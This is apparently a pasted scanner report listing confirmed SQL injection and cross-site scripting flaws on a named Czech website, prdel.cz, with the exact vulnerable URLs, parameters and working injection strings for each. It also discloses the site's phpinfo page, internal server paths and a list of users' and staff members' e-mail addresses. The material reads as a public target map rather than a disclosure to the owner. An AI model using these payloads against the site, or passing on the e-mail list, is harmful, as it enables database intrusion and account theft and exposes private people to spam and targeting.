Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ||| SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- URL: http://www.prdel.cz/rubrika.php?rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/rubrika.php?s=18&rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/horoskop.php?h=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Parameter Name: h
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&vypsat=1
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?s=20&id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: ' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/index_vypis.php?id=-1 OR 17-7=10
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- URL: http://www.prdel.cz/rubrika.php?rub='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id=%27
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/rubrika.php?s=18&rub='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/horoskop.php?h=%27
- Parameter Name: h
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id=%27&vypsat=1
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?s=20&id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: sheslo
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: sheslo
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_zapom.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?s=20&id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&vypsat=3
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- URL: http://www.prdel.cz/rubrika.php?rub='"--></style></script><script>alert(0x000090)</script>
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000090)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122'"--></style></script><script>alert(0x0000B1)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: 122'"--></style></script><script>alert(0x0000B1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id='"--></style></script><script>alert(0x00013C)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00013C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id='"--></style></script><script>alert(0x000177)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000177)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000231)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: 122'"--></style></script><script>alert(0x000236)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/rubrika.php?s=18&rub='"--></style></script><script>alert(0x00024D)</script>
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00024D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00028D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00028E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00028F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/centrum.php
- Parameter Name: centrum
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002B1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/centrum.php
- Parameter Name: centrum
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002F7)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00031D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00033C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: text
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000312)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000351)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000352)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000353)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: vec
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000356)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/ankety.php?s=15&rub='"--></style></script><script>alert(0x000379)</script>
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000379)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/horoskop.php?h='"--></style></script><script>alert(0x000380)</script>
- Parameter Name: h
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000380)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id='"--></style></script><script>alert(0x0003E5)</script>&vypsat=1
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003E5)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?s=20&id='"--></style></script><script>alert(0x000400)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000400)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: text
- Parameter Type: Post
- Attack Pattern: '"><net sparker=alert(0x00037F)>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000439)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00041E)</script>
- Severity: Important
- Confirmation : Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00043A)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00043B)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: vec
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00043C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004AA)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004AB)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: sheslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004CC)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_zapom.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004DC)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?s=20&id='"--></style></script><script>alert(0x00052D)</script>&vypsat=3
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00052D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?s=20&id=2&vypsat=3'"--></style></script><script>alert(0x000530)</script>
- Parameter Name: vypsat
- Parameter Type: Querystring
- Attack Pattern: 3'"--></style></script><script>alert(0x000530)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: text
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004D8)</script>
- ||| [Possible] Cross-site Scripting
- Severity : Medium
- Confirmation: Confirmed
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- URL: http://www.prdel.cz/clanek.php?id='"--></style></script><script>alert(0x00009C)</script>
- Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable
- in many conditions however it still indicates lack of correct filtering and should be addressed.
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x00009C)</script>
- Severity : Medium
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id='"--></style></script><script>alert(0x000201)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000201)</script>
- Severity : Medium
- Confirmation : Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>netsparker(0x000483)</script>
- ||| phpinfo() Information Disclosure
- Severity : Low
- Confirmation: Confirmed
- URL: http://www.prdel.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| File Upload Functionality Identified
- Severity : Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Form Name: ico
- Severity : Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Form Name: ico
- ||| MySQL Database Identified
- Severity : Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/rubrika.php?rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- ||| Password Transmitted Over HTTP
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- ||| E-mail Address Disclosure
- Severity : Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/
- Found E-mails: polibte.nam@prdel.cz
- costrova@prdel.cz
- Severity : Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/starsi_prispevky.php?co=
- Found E-mails: postreleny@gmail.com
- kanalnik987@seznam.cz
- admin@netlife.502.cz
- intelvodrazka@seznam.cz
- SexyRadaBieber@seznam.cz
- polibte.nam@prdel.cz
- ||| [Possible] Internal Path Leakage (*nix)
- Severity : Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/obj/usr/src/sys/GENERIC
- /usr/local/etc/php'
- /usr/local'
- /usr/local/man'
- /usr/local/info/'
- /usr/local/etc
- /usr/local/etc/php.ini
- /usr/local/etc/php
- /usr/local/etc/php/extensions.ini
- /var/log/php_errors.log
- /usr/local/lib/php/20090626
- /usr/local/share/pear
- /usr/sbin/sendmail -t -i
- /usr/sbin/sendmail
- /usr/home/costra/web/prdel.cz/www/phpinfo.php
- /usr/local/bin/php-cgi
- /usr/sbin:/usr/bin
- /usr/home/costra/web/prdel.cz/www
